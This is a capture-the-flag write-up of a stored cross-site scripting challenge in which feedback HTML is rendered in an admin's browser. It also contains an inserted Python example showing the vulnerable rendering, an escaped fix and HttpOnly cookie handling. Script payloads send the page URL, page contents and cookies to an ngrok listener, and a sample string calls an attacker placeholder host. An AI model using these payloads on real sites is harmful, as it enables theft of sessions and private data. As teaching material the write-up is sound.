# bxxs

## Problem

We've made some new epic updates to our website. Could you send us some feedback on it?

## Solution

We are given an endpoint that allows us to "Send a feedback to admin". I tried submitting URLs but these had no effect.

![](/files/-MbXGNkorTXxwBasI9li)

Later, I found that we could submit arbitrary HTML that would be rendered by the admin's browser. This could be verified by submitting the following and catching the resulting HTTP request on a listener we control (here, an ngrok tunnel):

```markup
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/"; </script>
```

It is then trivial to obtain more information from the victim's browser.

We still don't know how exactly our submitted HTML is handled. Where is it rendered, and in what context? To answer that question, I tried the following payload to exfiltrate the page URL, the page contents and the cookies visible to JavaScript.

```markup
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?url=" + escape(window.location.href); </script>
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?doc=" + escape(document.body.innerHTML); </script>
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?cookie=" + escape(document.cookie); </script>
```

`window.location.href` gives us the full URL of the browsing context, `document.body.innerHTML` gives us the page contents, and `document.cookie` gives us any cookies that could be read by JavaScript (those without the HttpOnly flag set).

From the output, it appeared that:

* The page URL is `http://0.0.0.0/Secret_admin_cookie_panel`
* Our submitted HTML was the only content present on the page.
* JavaScript could not read any cookies.

My teammate rainbowpigeon then visited the `/Secret_admin_cookie_panel` endpoint and found that this page returned a `Set-Cookie` header for a new cookie with the HttpOnly flag set. This was the "admin cookie" we needed.
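To make the two observations above concrete (feedback rendered verbatim in the admin page, and a cookie that `document.cookie` cannot see because of HttpOnly), here is an added Python example that is not part of the original writeup or the challenge's code: it shows the vulnerable rendering pattern beside the escaped form, builds the kind of HttpOnly `Set-Cookie` the panel returned, and models which cookies would be readable from JavaScript. The cookie name `admin`, the listener host and the feedback string are constructed assumptions.

```python
import html
from http.cookies import SimpleCookie
from typing import List

# Constructed sample input: the kind of feedback the writeup submits
# (placeholder host, not a real listener).
FEEDBACK = ('<script> var i = new Image(); '
            'i.src = "http://attacker.invalid/?c=" + escape(document.cookie); </script>')


def render_admin_panel_vulnerable(feedback: str) -> str:
    """The pattern the challenge exhibits: untrusted feedback is inserted into the
    admin page verbatim, so a <script> in it executes in the admin's browser."""
    return f"<html><body>{feedback}</body></html>"


def render_admin_panel_fixed(feedback: str) -> str:
    """Hardened form: HTML-escape the feedback so the browser renders it as text."""
    return f"<html><body>{html.escape(feedback, quote=True)}</body></html>"


def admin_set_cookie(session_value: str) -> str:
    """Build the Set-Cookie value for the admin session with HttpOnly (as the panel
    did), plus SameSite and Path. The cookie name 'admin' is an assumption."""
    c = SimpleCookie()
    c["admin"] = session_value
    c["admin"]["httponly"] = True
    c["admin"]["samesite"] = "Strict"
    c["admin"]["path"] = "/"
    return c.output(header="").strip()


def cookies_visible_to_js(set_cookie_headers: List[str]) -> List[str]:
    """Model what document.cookie exposes: only cookies set without HttpOnly.
    This is why the exfiltrated document.cookie in the writeup was empty."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        if "httponly" not in attrs:
            visible.append(name)
    return visible


def contains_script_tag(page: str) -> bool:
    """Simple check used to compare the two renderings."""
    return "<script" in page.lower()
```

Escaping fixes this particular panel; a `Content-Security-Policy` without `'unsafe-inline'` would additionally stop an inline script from running even if escaping were missed somewhere.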

![](/files/-MbXFEsm1MXZkGgE06Je)

My teammate lim\_yj found that there is a `/flag` endpoint, which was inaccessible without the appropriate cookie.

Visiting `/flag` again with the admin cookie set gives us the flag.

![](/files/-MbXFst9p9LN_BTEw3Rx)
